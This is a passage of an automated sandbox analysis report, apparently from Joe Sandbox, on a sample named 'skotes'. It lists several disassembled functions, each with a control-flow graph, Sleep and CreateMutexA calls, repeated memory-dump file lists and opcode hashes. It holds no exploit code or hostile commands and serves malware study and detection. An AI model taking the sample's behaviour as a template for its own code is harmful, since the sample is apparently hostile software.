                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 22 99f44-99f64 26 99f92-99fae 22->26 27 99f66-99f72 22->27 30 99fdc-99ffb 26->30 31 99fb0-99fbc 26->31 28 99f88-99f8f call ad663 27->28 29 99f74-99f82 27->29 28->26 29->28 32 9a92b 29->32 36 9a029-9a916 call a80c0 30->36 37 99ffd-9a009 30->37 34 99fbe-99fcc 31->34 35 99fd2-99fd9 call ad663 31->35 39 9a953-9a994 Sleep CreateMutexA 32->39 40 9a92b call c6c6a 32->40 34->32 34->35 35->30 43 9a00b-9a019 37->43 44 9a01f-9a026 call ad663 37->44 52 9a9a7-9a9a8 39->52 53 9a996-9a998 39->53 40->39 43->32 43->44 44->36 53->52 54 9a99a-9a9a5 53->54 54->52
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 9a9dd208b3d1c9270bbf0ea1b0b355969935aa81abce18a31909a82d2fd8ff55
                                                                                                                                                                                                                                                  • Instruction ID: 520895fa71ba21163cda158d0059deb9b28beebdd8133d2db657ceb62c564862
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a9dd208b3d1c9270bbf0ea1b0b355969935aa81abce18a31909a82d2fd8ff55
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E83146317042049BEF189BBCDC89BADB7A2EBC7310F24861DE415EB6D1C776D9809792
                                                                                                                                                                                                                                                  Function 0009A079 Relevance: 3.1, APIs: 2, Instructions: 136sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 56 9a079-9a099 60 9a09b-9a0a7 56->60 61 9a0c7-9a0e3 56->61 62 9a0a9-9a0b7 60->62 63 9a0bd-9a0c4 call ad663 60->63 64 9a111-9a130 61->64 65 9a0e5-9a0f1 61->65 62->63 70 9a930 62->70 63->61 68 9a15e-9a916 call a80c0 64->68 69 9a132-9a13e 64->69 66 9a0f3-9a101 65->66 67 9a107-9a10e call ad663 65->67 66->67 66->70 67->64 73 9a140-9a14e 69->73 74 9a154-9a15b call ad663 69->74 77 9a953-9a994 Sleep CreateMutexA 70->77 78 9a930 call c6c6a 70->78 73->70 73->74 74->68 86 9a9a7-9a9a8 77->86 87 9a996-9a998 77->87 78->77 87->86 88 9a99a-9a9a5 87->88 88->86
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 3be6cf5daaf187a12da573a39bb30c567865b484fdb9dbeac727a0a396328ce3
                                                                                                                                                                                                                                                  • Instruction ID: 0f96a373e82947c284475f3bfec05b113c5e708f6b5536331912d44284e3f412
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3be6cf5daaf187a12da573a39bb30c567865b484fdb9dbeac727a0a396328ce3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B311631B042449BEF189BBCCD89BADB7A2EBC3314F248719E014D76D5C776D9809792
                                                                                                                                                                                                                                                  Function 0009A1AE Relevance: 3.1, APIs: 2, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 90 9a1ae-9a1ce 94 9a1fc-9a218 90->94 95 9a1d0-9a1dc 90->95 98 9a21a-9a226 94->98 99 9a246-9a265 94->99 96 9a1de-9a1ec 95->96 97 9a1f2-9a1f9 call ad663 95->97 96->97 100 9a935 96->100 97->94 102 9a228-9a236 98->102 103 9a23c-9a243 call ad663 98->103 104 9a293-9a916 call a80c0 99->104 105 9a267-9a273 99->105 109 9a953-9a994 Sleep CreateMutexA 100->109 110 9a935 call c6c6a 100->110 102->100 102->103 103->99 106 9a289-9a290 call ad663 105->106 107 9a275-9a283 105->107 106->104 107->100 107->106 120 9a9a7-9a9a8 109->120 121 9a996-9a998 109->121 110->109 121->120 122 9a99a-9a9a5 121->122 122->120
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797152074.0000000000279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797167103.000000000027B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.000000000027D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797181871.0000000000285000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797227965.000000000028B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797250428.000000000028C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797274904.000000000028E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797289779.000000000028F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797313862.000000000029A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797336491.000000000029E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797360786.00000000002B7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797382902.00000000002C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797401968.00000000002C7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797420486.00000000002CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797442450.00000000002E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797461001.00000000002E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797479757.00000000002EE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797498202.00000000002EF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797520647.00000000002F0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797543996.00000000002F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797563899.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797591340.00000000002FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797614702.0000000000305000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797634362.0000000000308000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797656115.0000000000309000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797691125.0000000000310000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797717114.0000000000318000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797801740.0000000000319000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797840131.000000000031A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797864975.0000000000322000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797886304.0000000000332000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797909176.0000000000333000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797934254.0000000000334000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.0000000000336000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797955803.000000000035E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798011058.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798031229.0000000000376000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798053092.000000000038B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798076382.000000000038C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798101812.0000000000391000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798122885.0000000000393000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798147218.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1798166267.00000000003A3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_90000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: eae44d52b78c7e8fa68c04b8d1192a61e20959d1d390e930051fe014837d7565
                                                                                                                                                                                                                                                  • Instruction ID: a65fd330919608494650a5dd9d7d74b1e3b2a43671e6f7ac95dcf37c06ccd435
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eae44d52b78c7e8fa68c04b8d1192a61e20959d1d390e930051fe014837d7565
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF31F631B042409BEF189BBCDC89BADB7A2EB87310F244619E014DB6D5D776D9809792
                                                                                                                                                                                                                                                  Function 0009A418 Relevance: 3.1, APIs: 2, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 124 9a418-9a438 128 9a43a-9a446 124->128 129 9a466-9a482 124->129 132 9a448-9a456 128->132 133 9a45c-9a463 call ad663 128->133 130 9a4b0-9a4cf 129->130 131 9a484-9a490 129->131 137 9a4fd-9a916 call a80c0 130->137 138 9a4d1-9a4dd 130->138 135 9a492-9a4a0 131->135 136 9a4a6-9a4ad call ad663 131->136 132->133 139 9a93f-9a994 call c6c6a * 4 Sleep CreateMutexA 132->139 133->129 135->136 135->139 136->130 143 9a4df-9a4ed 138->143 144 9a4f3-9a4fa call ad663 138->144 160 9a9a7-9a9a8 139->160 161 9a996-9a998 139->161 143->139 143->144 144->137 161->160 162 9a99a-9a9a5 161->162 162->160
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 0009A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,000F3254), ref: 0009A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.1796827623.0000000000091000.00000040.00000001.01000000.00000007.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796755859.0000000000090000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796827623.00000000000F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796920266.00000000000F9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1796979923.00000000000FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797011577.0000000000107000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797109293.0000000000268000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.1797129613.000000000026B000.00000080.00000001.01000000.00000007.sdmpDownload File
